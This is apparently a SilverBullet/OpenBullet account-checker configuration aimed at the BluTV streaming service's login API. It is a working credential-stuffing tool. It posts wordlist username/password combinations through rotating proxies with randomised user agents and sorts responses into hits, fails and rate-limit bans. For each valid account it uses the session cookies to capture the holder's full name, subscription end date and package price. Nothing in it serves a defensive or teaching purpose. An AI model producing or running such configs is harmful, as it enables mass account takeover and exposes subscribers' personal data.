[SETTINGS]
{
  "Name": "BluTv_Web",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-06-29T13:37:48.9335218+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Raymond",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 1,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "BluTv_Web",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION RandomString "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/?d?d?d.?d?d (KHTML, like Gecko) Chrome/91.0.?d?d?d?d.?d?d?d Safari/?d?d?d.?d?d" -> VAR "UA" 

REQUEST POST "https://www.blutv.com/api/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"remember\":true}" 
  CONTENTTYPE "text/plain;charset=UTF-8" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "appcountry: TUR" 
  HEADER "applanguage: tr-TR" 
  HEADER "appplatform: com.blu" 
  HEADER "content-type: text/plain;charset=UTF-8" 
  HEADER "origin: https://www.blutv.com" 
  HEADER "referer: https://www.blutv.com/giris" 
  HEADER "user-agent: <UA>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "errors.wrongUsernameOrPassword" 
    KEY "errorCode\":\"errors.validationError" 
    KEY "errors.SyntaxError" 
  KEYCHAIN Success OR 
    KEY "accessToken" 
  KEYCHAIN Ban OR 
    KEY "status\":429" 

PARSE "<COOKIES(bluToken)>" LR "" "" -> VAR "blu" 

PARSE "<COOKIES(token_a)>" LR "" "" -> VAR "token_a" 

PARSE "<COOKIES(token_r)>" LR "" "" -> VAR "token_r" 

REQUEST GET "https://www.blutv.com/api/me" 
  
  HEADER "Host: www.blutv.com" 
  HEADER "Connection: keep-alive" 
  HEADER "AppPlatform: com.blu" 
  HEADER "AppCountry: TUR" 
  HEADER "AppLanguage: tr-TR" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: <UA>" 
  HEADER "Accept: */*" 
  HEADER "Referer: https://www.blutv.com/giris" 
  HEADER "Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "Cookie: bluToken=<blu>%22%2C%22; token_a=<token_a>; token_r=<token_r>" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "state\":\"NONE\"" 
    KEY "state\":\"SUSPEND\"" 
    KEY "state\":\"CANCELLED" 

PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "İsim & Soyisim" 

PARSE "<SOURCE>" JSON "end_date" -> VAR "1" 

PARSE "<1>" LR "" " " CreateEmpty=FALSE -> CAP "Üyelik Bitiş Tarihi" 

PARSE "<SOURCE>" JSON "price" CreateEmpty=FALSE -> CAP "Paket Fiyatı" "" " ₺" 

